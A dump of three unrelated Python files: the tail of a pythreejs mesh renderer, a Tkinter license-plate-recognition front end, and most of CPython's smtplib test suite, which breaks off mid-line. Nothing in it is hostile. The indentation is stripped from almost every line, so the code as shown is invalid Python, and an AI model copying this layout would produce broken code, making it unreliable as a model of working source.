return i
i = i + 1
def __as_buffer_attr(self, array):
#BufferAttribute stores data for an attribute (such as vertex positions, face indices etc) associated with a BufferGeometry,
return three.BufferAttribute(array, normalized = False, dynamic = True)
def __get_wireframe_from_boundary(self):
#edges in the boundary box
edges = self.geometry.vertices[self.geometry.as_edges_flat()].astype(np.float32)
#The function empty returns an array without values initialized
buffer = np.empty((int(edges.shape[0] * 3), 3), dtype=np.float32).reshape(-1, 3)
buffer[:edges.shape[0]] = edges
vertices = self.__as_buffer_attr(buffer)
wireframe = three.BufferGeometry(attributes={'position': vertices})
        #Execute the method specified by `method_name` on the three object, with arguments `args`
#SetDrawRange is a function that sets the attribute DrawRange which determines the part of the geometry to render. (start, end)
wireframe.exec_three_obj_method("setDrawRange", 0, edges.shape[0])
return wireframe
def getTexture(self, filename):
tex = None
if filename is not None:
tex = three.ImageTexture(filename)
return tex
def color (self, array):
#From rgb (0 to 1) to rgb (0 to 255) and from rgb (0 to 255) to html color
r = (int)(array[0] * 255.999)
g = (int)(array[1] * 255.999)
b = (int)(array[2] * 255.999)
return '#%02x%02x%02x' % (r, g, b)
def __initialize_mesh(self):
drawable_geometry = self.__get_drawable_from_boundary()
#No color under textures or materials
if len(self.geometry.material) != 0 or self.geometry.texture is not None:
vertexEnum = 'NoColors'
else:
vertexEnum = 'FaceColors'
materials = []
#LambertMaterial is a material for non-shiny surfaces, without specular highlights.
if len(self.geometry.material) == 0: #No material or texture
material_geometry = three.MeshLambertMaterial(
map = self.getTexture(self.texture),
polygonOffset=True,
polygonOffsetFactor=1,
polygonOffsetUnits=1,
flatShading = True,
opacity = 1.,
transparent = False,
side = 'DoubleSide',
wireframe=False,
vertexColors = vertexEnum)
materials = material_geometry
else:
for m in self.geometry.material:
if self.geometry.smoothness:
material_geometry = three.MeshLambertMaterial(
map=self.getTexture(self.geometry.material[m]["map_kd"]),
color=self.color(self.geometry.material[m]["kd"]),
emissiveIntensity=self.geometry.material[m]["ke"],
specular=self.color(self.geometry.material[m]["ks"]),
shininess=self.geometry.material[m]["ns"],
transparence=self.geometry.material[m]["transparence"],
opacity=self.geometry.material[m]["opacity"],
emissiveMap=self.getTexture(self.geometry.material[m]["map_ke"]),
alphaMap=self.getTexture(self.geometry.material[m]["map_d"]),
specularMap=self.getTexture(self.geometry.material[m]["map_ks"]),
bumpMap=self.getTexture(self.geometry.material[m]["bump"]),
normalMap=self.getTexture(self.geometry.material[m]["norm"]),
refractionRatio=self.geometry.material[m]["ni"]
)
else:
material_geometry = three.MeshPhongMaterial(
map = self.getTexture(self.geometry.material[m]["map_kd"]),
color = self.color(self.geometry.material[m]["kd"]),
emissiveIntensity = self.geometry.material[m]["ke"],
specular = self.color(self.geometry.material[m]["ks"]),
shininess =self.geometry.material[m]["ns"],
transparence = self.geometry.material[m]["transparence"],
opacity = self.geometry.material[m]["opacity"],
emissiveMap = self.getTexture(self.geometry.material[m]["map_ke"]),
alphaMap = self.getTexture(self.geometry.material[m]["map_d"]),
specularMap = self.getTexture(self.geometry.material[m]["map_ks"]),
bumpMap = self.getTexture(self.geometry.material[m]["bump"]),
normalMap = self.getTexture(self.geometry.material[m]["norm"]),
refractionRatio = self.geometry.material[m]["ni"]
)
materials.append(material_geometry)
mesh1 = three.Mesh(
geometry=drawable_geometry,
material=materials,
position=[0, 0, 0]
)
return mesh1
def run(self, geometry):
edges = self.geometry.vertices[self.geometry.as_edges_flat()].astype(np.float32)
self.wireframe.geometry.attributes['position'].array = edges
        #initialization of the color
self.geometry_color = self.__initialize_geometry_color(None, geometry)
if self._color_map is None:
self.update_internal_color(self._internal_color, geometry)
self.update_external_color(self._external_color, geometry)
elif self._label_colors is not None:
self.update_color_label(geometry)
else:
self.compute_color_map(self._metric_string, self._c_map_string, geometry)
if self.queue:
self.queue = False
self.updating = False
self.update()
else:
self.updating = False
def update(self):
if (not self.updating):
self.updating = True
thread = threading.Thread(target=self.run, args=(self.geometry.copy(),))
thread.daemon = True
thread.start()
else:
self.queue = True
@property
def center(self):
return self.geometry.center
@property
def scale(self):
return self.geometry.scale
|
surface.py
|
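# Tkinter front end of a Chinese license plate recognition demo: the window title
# "车牌识别" means "license plate recognition", and the two buttons load a plate
# image from disk ("来自图片", "from picture") or from the webcam ("来自摄像头",
# "from camera") and hand it to predict.CardPredictor for detection.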
import tkinter as tk
from tkinter.filedialog import *
from tkinter import ttk
from tkinter import messagebox as mBox  # used for the camera-failure warning in from_vedio()
import predict
import cv2
from PIL import Image, ImageTk
import threading
import time
class Surface(ttk.Frame):
pic_path = ""
viewhigh = 600
viewwide = 600
update_time = 0
thread = None
thread_run = False
camera = None
color_transform = {"green":("绿牌","#55FF55"), "yello":("黄牌","#FFFF00"), "blue":("蓝牌","#6666FF")}
def __init__(self, win):
ttk.Frame.__init__(self, win)
frame_left = ttk.Frame(self)
frame_right1 = ttk.Frame(self)
frame_right2 = ttk.Frame(self)
win.title("车牌识别")
win.state("zoomed")
self.pack(fill=tk.BOTH, expand=tk.YES, padx="5", pady="5")
frame_left.pack(side=LEFT,expand=1,fill=BOTH)
frame_right1.pack(side=TOP,expand=1,fill=tk.Y)
frame_right2.pack(side=RIGHT,expand=0)
ttk.Label(frame_left, text='原图:').pack(anchor="nw")
ttk.Label(frame_right1, text='车牌位置:').grid(column=0, row=0, sticky=tk.W)
from_pic_ctl = ttk.Button(frame_right2, text="来自图片", width=20, command=self.from_pic)
from_vedio_ctl = ttk.Button(frame_right2, text="来自摄像头", width=20, command=self.from_vedio)
self.image_ctl = ttk.Label(frame_left)
self.image_ctl.pack(anchor="nw")
self.roi_ctl = ttk.Label(frame_right1)
self.roi_ctl.grid(column=0, row=1, sticky=tk.W)
ttk.Label(frame_right1, text='识别结果:').grid(column=0, row=2, sticky=tk.W)
self.r_ctl = ttk.Label(frame_right1, text="")
self.r_ctl.grid(column=0, row=3, sticky=tk.W)
self.color_ctl = ttk.Label(frame_right1, text="", width="20")
self.color_ctl.grid(column=0, row=4, sticky=tk.W)
from_vedio_ctl.pack(anchor="se", pady="5")
from_pic_ctl.pack(anchor="se", pady="5")
self.predictor = predict.CardPredictor()
self.predictor.train_svm()
def get_imgtk(self, img_bgr):
img = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2RGB)
im = Image.fromarray(img)
imgtk = ImageTk.PhotoImage(image=im)
wide = imgtk.width()
high = imgtk.height()
if wide > self.viewwide or high > self.viewhigh:
wide_factor = self.viewwide / wide
high_factor = self.viewhigh / high
factor = min(wide_factor, high_factor)
wide = int(wide * factor)
if wide <= 0 : wide = 1
high = int(high * factor)
if high <= 0 : high = 1
im=im.resize((wide, high), Image.ANTIALIAS)
imgtk = ImageTk.PhotoImage(image=im)
return imgtk
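    # show_roi() keeps the last detected plate on screen: on a failed detection it
    # only clears the result widgets if no successful detection happened within
    # the previous eight seconds (update_time), so the display does not flicker
    # while the camera thread keeps predicting.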
def show_roi(self, r, roi, color):
if r :
roi = cv2.cvtColor(roi, cv2.COLOR_BGR2RGB)
roi = Image.fromarray(roi)
self.imgtk_roi = ImageTk.PhotoImage(image=roi)
self.roi_ctl.configure(image=self.imgtk_roi, state='enable')
self.r_ctl.configure(text=str(r))
self.update_time = time.time()
try:
c = self.color_transform[color]
self.color_ctl.configure(text=c[0], background=c[1], state='enable')
            except KeyError:
self.color_ctl.configure(state='disabled')
elif self.update_time + 8 < time.time():
self.roi_ctl.configure(state='disabled')
self.r_ctl.configure(text="")
self.color_ctl.configure(state='disabled')
def from_vedio(self):
if self.thread_run:
return
if self.camera is None:
self.camera = cv2.VideoCapture(0)
if not self.camera.isOpened():
mBox.showwarning('警告', '摄像头打开失败!')
self.camera = None
return
self.thread = threading.Thread(target=self.vedio_thread, args=(self,))
        self.thread.daemon = True  # Thread.setDaemon() is deprecated; set the attribute directly
self.thread.start()
self.thread_run = True
def from_pic(self):
self.thread_run = False
self.pic_path = askopenfilename(title="选择识别图片", filetypes=[("jpg图片", "*.jpg")])
if self.pic_path:
img_bgr = predict.imreadex(self.pic_path)
self.imgtk = self.get_imgtk(img_bgr)
self.image_ctl.configure(image=self.imgtk)
resize_rates = (1, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4)
for resize_rate in resize_rates:
print("resize_rate:", resize_rate)
r, roi, color = self.predictor.predict(img_bgr, resize_rate)
if r:
break
#r, roi, color = self.predictor.predict(img_bgr, 1)
self.show_roi(r, roi, color)
@staticmethod
def vedio_thread(self):
self.thread_run = True
predict_time = time.time()
while self.thread_run:
_, img_bgr = self.camera.read()
self.imgtk = self.get_imgtk(img_bgr)
self.image_ctl.configure(image=self.imgtk)
if time.time() - predict_time > 2:
r, roi, color = self.predictor.predict(img_bgr)
self.show_roi(r, roi, color)
predict_time = time.time()
print("run end")
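# close_window() is registered below as the WM_DELETE_WINDOW handler: it asks the
# capture loop in vedio_thread() to stop (thread_run = False), waits up to two
# seconds for the thread to exit, and only then destroys the Tk window.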
def close_window():
print("destroy")
if surface.thread_run :
surface.thread_run = False
surface.thread.join(2.0)
win.destroy()
if __name__ == '__main__':
win=tk.Tk()
surface = Surface(win)
win.protocol('WM_DELETE_WINDOW', close_window)
win.mainloop()
|
test_smtplib.py
|
import asyncore
import base64
import email.mime.text
from email.message import EmailMessage
from email.base64mime import body_encode as encode_base64
import email.utils
import hashlib
import hmac
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import errno
import textwrap
import threading
import unittest
from test import support, mock_socket
from test.support import hashlib_helper
from test.support import socket_helper
from test.support import threading_setup, threading_cleanup, join_thread
from unittest.mock import Mock
HOST = socket_helper.HOST
if sys.platform == 'darwin':
# select.poll returns a select.POLLHUP at the end of the tests
# on darwin, so just ignore it
def handle_expt(self):
pass
smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
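# server() above is the minimal socket server used by the TooLongLineTests fixture:
# it accepts a single connection, pushes the prepared reply buffer to the client in
# at most 500 select/send iterations, then closes the sockets, signalling the event
# once after listen() and once again when it is done.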
class GeneralTests:
def setUp(self):
smtplib.socket = mock_socket
self.port = 25
def tearDown(self):
smtplib.socket = socket
# This method is no longer used but is retained for backward compatibility,
# so test to make sure it still works.
def testQuoteData(self):
teststr = "abc\n.jkl\rfoo\r\n..blue"
expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
self.assertEqual(expected, smtplib.quotedata(teststr))
def testBasic1(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
client = self.client(HOST, self.port)
client.close()
def testSourceAddress(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
client = self.client(HOST, self.port,
source_address=('127.0.0.1',19876))
self.assertEqual(client.source_address, ('127.0.0.1', 19876))
client.close()
def testBasic2(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects, include port in host name
client = self.client("%s:%s" % (HOST, self.port))
client.close()
def testLocalHostName(self):
mock_socket.reply_with(b"220 Hola mundo")
# check that supplied local_hostname is used
client = self.client(HOST, self.port, local_hostname="testhost")
self.assertEqual(client.local_hostname, "testhost")
client.close()
def testTimeoutDefault(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(mock_socket.getdefaulttimeout())
mock_socket.setdefaulttimeout(30)
self.assertEqual(mock_socket.getdefaulttimeout(), 30)
try:
client = self.client(HOST, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertEqual(client.sock.gettimeout(), 30)
client.close()
def testTimeoutNone(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
client = self.client(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(client.sock.gettimeout())
client.close()
def testTimeoutZero(self):
mock_socket.reply_with(b"220 Hola mundo")
with self.assertRaises(ValueError):
self.client(HOST, self.port, timeout=0)
def testTimeoutValue(self):
mock_socket.reply_with(b"220 Hola mundo")
client = self.client(HOST, self.port, timeout=30)
self.assertEqual(client.sock.gettimeout(), 30)
client.close()
def test_debuglevel(self):
mock_socket.reply_with(b"220 Hello world")
client = self.client()
client.set_debuglevel(1)
with support.captured_stderr() as stderr:
client.connect(HOST, self.port)
client.close()
expected = re.compile(r"^connect:", re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
def test_debuglevel_2(self):
mock_socket.reply_with(b"220 Hello world")
client = self.client()
client.set_debuglevel(2)
with support.captured_stderr() as stderr:
client.connect(HOST, self.port)
client.close()
expected = re.compile(r"^\d{2}:\d{2}:\d{2}\.\d{6} connect: ",
re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
class SMTPGeneralTests(GeneralTests, unittest.TestCase):
client = smtplib.SMTP
class LMTPGeneralTests(GeneralTests, unittest.TestCase):
client = smtplib.LMTP
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), "test requires Unix domain socket")
def testUnixDomainSocketTimeoutDefault(self):
local_host = '/some/local/lmtp/delivery/program'
mock_socket.reply_with(b"220 Hello world")
try:
client = self.client(local_host, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertIsNone(client.sock.gettimeout())
client.close()
def testTimeoutZero(self):
super().testTimeoutZero()
local_host = '/some/local/lmtp/delivery/program'
with self.assertRaises(ValueError):
self.client(local_host, timeout=0)
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Capture SMTPChannel debug output
self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
smtpd.DEBUGSTREAM = io.StringIO()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1),
decode_data=True)
# Keep a note of what server host and port were assigned
self.host, self.port = self.serv.socket.getsockname()[:2]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
# restore sys.stdout
sys.stdout = self.old_stdout
# restore DEBUGSTREAM
smtpd.DEBUGSTREAM.close()
smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def get_output_without_xpeer(self):
test_output = self.output.getvalue()
return re.sub(r'(.*?)^X-Peer:\s*\S+\n(.*)', r'\1\2',
test_output, flags=re.MULTILINE|re.DOTALL)
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.quit()
def testSourceAddress(self):
# connect
src_port = socket_helper.find_unused_port()
try:
smtp = smtplib.SMTP(self.host, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT,
source_address=(self.host, src_port))
self.addCleanup(smtp.close)
self.assertEqual(smtp.source_address, (self.host, src_port))
self.assertEqual(smtp.local_hostname, 'localhost')
smtp.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to source port %d" % src_port)
raise
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testELHO(self):
# EHLO isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'\nSIZE 33554432\nHELP')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testEXPNNotImplemented(self):
# EXPN isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (502, b'EXPN not implemented')
smtp.putcmd('EXPN')
self.assertEqual(smtp.getreply(), expected)
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (252, b'Cannot VRFY user, but will accept message ' + \
b'and attempt delivery')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.helo()
expected = (503, b'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertEqual(smtp.help(), b'Supported commands: EHLO HELO MAIL ' + \
b'RCPT DATA RSET NOOP QUIT VRFY')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
# Issue 12283
m = '.A test\n.mes.sage.'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('<>', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: <>$", re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds as figuring out
# exactly what IP address format is put there is not easy (and
# irrelevant to our test). Typically 127.0.0.1 or ::1, but it is
# not always the same as socket.gethostbyname(HOST). :(
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
# make sure the Bcc header is still in the message.
self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
'<warped@silly.walks.com>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
# The Bcc header should not be transmitted.
del m['Bcc']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'warped@silly.walks.com'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
# Make sure nothing breaks if not all of the three 'to' headers exist
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
# Make sure addresses specified in call override those in message.
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='joe@example.com', to_addrs='foo@example.net')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: joe@example.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile(r"^recips: .*'foo@example.net'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
# Sender overrides To
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = 'the_rescuers@Rescue-Aid-Society.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: the_rescuers@Rescue-Aid-Society.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# The Resent-Bcc headers are deleted before serialization.
del m['Bcc']
del m['Resent-Bcc']
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: holy@grail.net$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('my_mom@great.cooker.com', 'Jeff', 'doe@losthope.net'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = 'holy@grail.net'
m['Resent-From'] = 'Martha <my_mom@great.cooker.com>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
class NonConnectingTests(unittest.TestCase):
def testNotConnected(self):
# Test various operations on an unconnected SMTP object that
# should raise exceptions (at present the attempt in SMTP.send
# to reference the nonexistent 'sock' attribute of the SMTP object
# causes an AttributeError)
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises OSError
self.assertRaises(OSError, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(OSError, smtplib.SMTP,
"localhost:bogus")
def testSockAttributeExists(self):
# check that sock attribute is present outside of a connect() call
# (regression test, the previous behavior raised an
# AttributeError: 'SMTP' object has no attribute 'sock')
with smtplib.SMTP() as smtp:
self.assertIsNone(smtp.sock)
class DefaultArgumentsTests(unittest.TestCase):
def setUp(self):
self.msg = EmailMessage()
self.msg['From'] = 'Páolo <főo@bar.com>'
self.smtp = smtplib.SMTP()
self.smtp.ehlo = Mock(return_value=(200, 'OK'))
self.smtp.has_extn, self.smtp.sendmail = Mock(), Mock()
def testSendMessage(self):
expected_mail_options = ('SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg)
self.smtp.send_message(self.msg)
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
